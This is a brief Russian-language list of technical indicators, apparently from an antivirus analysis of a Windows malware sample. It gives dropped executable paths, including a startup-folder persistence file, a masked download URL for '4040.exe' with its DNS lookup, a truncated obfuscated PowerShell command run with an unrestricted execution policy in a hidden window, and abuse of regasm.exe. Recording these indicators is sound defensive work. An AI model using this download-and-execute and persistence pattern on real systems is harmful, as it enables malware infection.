Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\hjdytuap.exe
- 'C:\users\public\hbx.exe'
- C:\users\public\hbx.exe
- %APPDATA%\demi.exe
- http://sk####chines.xyz/4040.exe
- DNS ASK sk####chines.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$eosbzmhlyx = Get-Random -Min 3 -Max 4;$guylbonzvxs = ([char[]]([char]97..[char]122));$fgjyxli = -join ($guylbonzvxs | Get-Random -Count $eo...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'